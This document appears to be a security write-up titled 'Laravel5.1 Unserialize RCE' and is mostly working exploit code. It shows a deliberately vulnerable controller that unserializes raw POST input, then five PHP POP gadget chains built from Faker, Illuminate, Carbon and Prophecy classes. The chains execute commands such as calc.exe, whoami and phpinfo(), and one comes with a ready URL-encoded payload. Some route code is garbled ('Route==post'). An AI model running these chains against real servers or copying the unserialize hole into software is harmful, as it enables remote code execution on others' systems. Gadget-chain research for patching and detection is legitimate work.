Laravel5.1 Unserialize RCE #1
Description
Laravel 5.1 POP Chain 1-5
composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"
app/Http/Controllers/UsersController.php adding a controller UsersController
<?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
class UsersController extends Controller
{
/**
* 创建一个新用户。
*
* @param Request $request
* @return Response
*/
public function store(Request $request)
{
echo "Please post cmd to unserialize";
$payload=$request->input("cmd");
unserialize($payload);
//
}
}
?>routes/web.php
Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);
<?php
use Illuminate\Support\Facades\Route;
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);0x01 RCE 1
<?php
namespace Faker;
class ChanceGenerator{
private $weight;
protected $default;
public function __construct(){
$this->weight=0;
$this->default='calc.exe';
}
}
namespace Faker;
class ValidGenerator{
protected $generator;
protected $validator;
protected $maxRetries;
public function __construct(){
$this->generator=new ChanceGenerator();
$this->validator='system';
$this->maxRetries=1;
}
}
namespace Illuminate\Broadcasting;
use Faker\ValidGenerator;
class PendingBroadcast{
protected $events;
public function __construct(){
$this->events=new ValidGenerator();
}
}
echo urlencode(serialize(new PendingBroadcast));
?>cmd=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A21%3A%22Faker%5CChanceGenerator%22%3A2%3A%7Bs%3A29%3A%22%00Faker%5CChanceGenerator%00weight%22%3Bi%3A0%3Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A8%3A%22calc.exe%22%3B%7Ds%3A12%3A%22%00%2A%00validator%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7D%7D
0x02 RCE2
<?php
namespace Illuminate\Validation;
class Validator{
public $extensions = [];
public function __construct(){
$this->extensions['']='call_user_func';
}
}
namespace Illuminate\Routing;
use Illuminate\Validation\Validator;
class PendingResourceRegistration{
protected $registrar;
protected $name;
protected $controller;
protected $options;
public function __construct(){
$this->name='call_user_func';
$this->controller='system';
$this->options='whoami';
$this->registrar=new Validator;
}
}RCE 3
<?php
namespace Illuminate\Auth;
class RequestGuard{
protected $provider;
protected $callback;
protected $request;
public function __construct(){
$this->callback = 'call_user_func';
$this->request = 'system';
$this->provider = 'calc.exe';
}
}
namespace Illuminate\View;
use Illuminate\Auth\RequestGuard;
class InvokableComponentVariable{
protected $callable=[];
public function __construct(){
$this->callable=[new RequestGuard,'user'];
}
}
namespace SebastianBergmann\RecursionContext;
use Illuminate\View\InvokableComponentVariable;
final class Context{
private $arrays = [];
public function __construct(){
$this->arrays=new InvokableComponentVariable;
}
}
echo urlencode(serialize(new Context));
?>RCE 4
<?php
namespace Faker;
class DefaultGenerator{
public $default;
}
namespace Carbon;
class Carbon{}
namespace Faker;
class Generator{
protected $formatters = [];
public function __construct(){
$this->formatters['huahua']='system';
}
}
namespace Carbon;
use Carbon\Carbon;
use Faker\DefaultGenerator;
use Faker\Generator;
class CarbonPeriod{
protected $current;
protected $dateClass;
protected $filters = [];
protected $key;
public function __construct(){
$this->dateClass=new DefaultGenerator;
$this->dateClass->default=new DefaultGenerator;
$this->dateClass->default->default='huahua';
$this->current=new Carbon;
$this->filters[][]=[new Generator,'format'];
$this->key=array("calc.exe");
}
}
namespace Illuminate\View;
use Carbon\CarbonPeriod;
class InvokableComponentVariable{
protected $callable=[];
public function __construct(){
$this->callable=[new CarbonPeriod,'valid'];
}
}
namespace SebastianBergmann\RecursionContext;
use Illuminate\View\InvokableComponentVariable;
final class Context{
private $arrays = [];
public function __construct(){
$this->arrays=new InvokableComponentVariable;
}
}
echo urlencode(serialize(new Context));
?>RCE 5
<?php
namespace Faker;
class DefaultGenerator{
public $default;
}
namespace Prophecy\Doubler\Generator;
use Faker\DefaultGenerator;
class ClassCreator{
private $generator;
public function __construct(){
$this->generator=new DefaultGenerator;
$this->generator->default='phpinfo();';
}
}
namespace Carbon;
class Carbon{}
namespace Prophecy\Doubler\Generator\Node;
class ClassNode{}
namespace Carbon;
use Faker\DefaultGenerator;
use Prophecy\Doubler\Generator\ClassCreator;
use Prophecy\Doubler\Generator\Node\ClassNode;
class CarbonPeriod{
protected $current;
protected $dateClass;
protected $filters = [];
protected $key;
public function __construct(){
$this->dateClass=new DefaultGenerator;
$this->dateClass->default=new DefaultGenerator;
$this->dateClass->default->default='huahua';
$this->current=new Carbon;
$this->filters[][]=[new ClassCreator,'create'];
$this->key=new ClassNode;
}
}
namespace Illuminate\View;
use Carbon\CarbonPeriod;
class InvokableComponentVariable{
protected $callable=[];
public function __construct(){
$this->callable=[new CarbonPeriod,'valid'];
}
}
namespace SebastianBergmann\RecursionContext;
use Illuminate\View\InvokableComponentVariable;
final class Context{
private $arrays = [];
public function __construct(){
$this->arrays=new InvokableComponentVariable;
}
}
echo urlencode(serialize(new Context));
?>